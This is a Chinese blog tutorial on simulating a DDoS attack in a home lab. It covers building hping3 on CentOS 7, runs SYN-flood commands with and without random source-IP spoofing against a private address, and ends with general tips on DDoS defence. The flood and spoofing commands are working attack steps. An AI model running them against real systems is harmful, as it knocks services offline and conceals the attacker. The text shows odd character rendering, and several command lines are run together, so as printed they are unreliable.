前言：電影院如期開(kāi)放，據(jù)前線消息，人實(shí)在是少，有些場(chǎng)次一個(gè)人看一場(chǎng)，在華夏有電影院開(kāi)始，應(yīng)該都少有這種場(chǎng)景吧，再次希望疫情早日散去，在此引用一句話來(lái)配合一次圖：“直到烏云散去風(fēng)雨落幕，我們一起走向未來(lái)。”

一，什么是DDoS攻擊

分布式拒絕服務(wù)攻擊(英文意思是Distributed Denial of Service，簡(jiǎn)稱DDoS)是指處于不同位置的多個(gè)攻擊者同時(shí)向一個(gè)或數(shù)個(gè)目標(biāo)發(fā)動(dòng)攻擊，或者一個(gè)攻擊者控制了位于不同位置的多臺(tái)機(jī)器并利用這些機(jī)器對(duì)受害者同時(shí)實(shí)施攻擊。由于攻擊的發(fā)出點(diǎn)是分布在不同地方的，這類攻擊稱為分布式拒絕服務(wù)攻擊，其中的攻擊者可以有多個(gè)。

常見(jiàn)的DDOS攻擊手段有SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Script Flood、Proxy Flood等

二，利用hping3工具DOS攻擊實(shí)驗(yàn)

1，準(zhǔn)備：

需要兩臺(tái)機(jī)器，一臺(tái)扮演攻擊源，另一做目標(biāo)源。

攻擊源地址(我這用centos7虛擬機(jī)):192.168.142.128

被攻擊機(jī)器地址(我這用本機(jī)):192.168.1.114

2，準(zhǔn)備軟件

• centos7.x系統(tǒng)

• winshake抓包軟件/linux下可以用tcpdump

• hping3軟件

3,軟件安裝，

winshake 可以在官網(wǎng)下載對(duì)應(yīng)

https://www.wireshark.org/download.html

linux下安裝hping3軟件和tcpdump如下：

?#yum安裝tcpdump yum install tcpdump -y#源碼安裝hping3#安裝依賴yum?install?-y?libpcap?libpcap-devel?tcl?tcl-devel?gccwget http://www.hping.org/hping3-20051105.tar.gztar -xzvf hping3-20051105.tar.gz && cd hping3-20051105./configuremakemake?instal

這里有幾個(gè)安裝問(wèn)題需要注意下：

1，因?yàn)槲业腸entos7虛機(jī)鏡像是3.10.0-229.el7.x86_64，64位的操作系統(tǒng)，而bytesex.h沒(méi)有對(duì)64位的支持，所以./configure時(shí)會(huì)報(bào)“build byteorder.c時(shí)出現(xiàn)如下錯(cuò)誤”

解決：在解壓目錄編輯bytesex.h，指定位置加上|| defined(__x86_64__)\

vim hping3-20051105/bytesex.h#在defined(__i386__) \后面加上下面這行|| defined(__x86_64__)\

2，報(bào)錯(cuò)libpcap_stuff.c:20:21: fatal error: net/bpf.h: No such file or directory

這是因?yàn)榘惭bpcap庫(kù)后沒(méi)做軟鏈接，解決如下：

ln?-sf?/usr/include/pcap-bpf.h?/usr/include/net/bpf.h

3，報(bào)錯(cuò)Can't install the man page: /usr/local/confd/man/man8 does not exist

解決：手動(dòng)創(chuàng)建/usr/local/confd/man/man8目錄

mkdir -p /usr/local/confd/man/man8#如果已經(jīng)make?install,還需要執(zhí)行下面三句才能重新make installrm?-rf?/usr/sbin/hping3rm?-rf?/usr/sbin/hpingrm -rf /usr/sbin/hping2#最后執(zhí)行make install

如上解決完，執(zhí)行hping3 -help，如下圖，代表軟件已經(jīng)安裝成功

三，DDoS攻擊實(shí)踐

1，在攻擊源，也就是我的虛擬機(jī)端輸入如下命令，這里兩個(gè)命令唯一的區(qū)別是--rand-source參數(shù)，目標(biāo)機(jī)器會(huì)看到一堆ip，不能定位你的實(shí)際IP。

hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 192.168.1.114hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood --rand-source 192.168.1.114#命令解釋-c：發(fā)送數(shù)據(jù)包的個(gè)數(shù)-d：每個(gè)數(shù)據(jù)包的大小-S：發(fā)送SYN數(shù)據(jù)包-w：TCP window大小-p：目標(biāo)端口，你可以指定任意端口–flood：盡可能快的發(fā)送數(shù)據(jù)包–rand-source：使用隨機(jī)的IP地址，目標(biāo)機(jī)器看到一堆ip，不能定位你的實(shí)際IP；也可以使用-a或–spoof隱藏主機(jī)名

實(shí)際觀察下兩個(gè)命令的效果

(1)hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 192.168.1.114

打開(kāi)winshake，查看抓包情況

(2)hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood --rand-source 192.168.1.114

可以看出，攻擊者ip已經(jīng)被隱藏

四，ddos攻擊預(yù)防

小編認(rèn)為，想完全防御住ddos的攻擊并不現(xiàn)實(shí)的，不過(guò)我們可以做到如下幾點(diǎn)來(lái)有限的限制ddos攻擊的損害

1，盡量避免NAT的使用

2，充足的網(wǎng)絡(luò)帶寬保證?

3，把網(wǎng)站做成靜態(tài)頁(yè)面? ?

4，設(shè)定路由器的過(guò)濾功能來(lái)防止

5，網(wǎng)絡(luò)設(shè)備或主機(jī)都需要隨時(shí)更新其系統(tǒng)漏洞、關(guān)閉不需要的服務(wù)、安裝必要的防 毒和防火墻軟件、隨時(shí)注意系統(tǒng)安全，避免被黑客和自動(dòng)化的 DDoS 程序植入攻擊程序

6，通過(guò)隱藏源IP方式可以實(shí)現(xiàn)，前提是要先找一個(gè)高防的盾機(jī)，再把IP隱藏起來(lái)(小編認(rèn)為最有效的是這種方法，不過(guò)前提是需要一臺(tái)服務(wù)器)

五，總結(jié)

目前開(kāi)源的ddos攻擊工具有很多(攻擊成本低，也是DDOS攻擊易于發(fā)生的原因之一)，但DDOS攻擊防御工具并不多，所以作為個(gè)人，我們應(yīng)該定期維護(hù)好自己的設(shè)備，比如定時(shí)更新或者開(kāi)啟防火墻規(guī)則，避免被人植入木馬，從而成為洪水攻擊的幫兇

最后的最后，歡迎交流：

關(guān)注公眾號(hào)留言，或者在下方直接留言：

總結(jié)

以上是生活随笔為你收集整理的ddos攻击工具_linux下DDoS攻击模拟实战的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。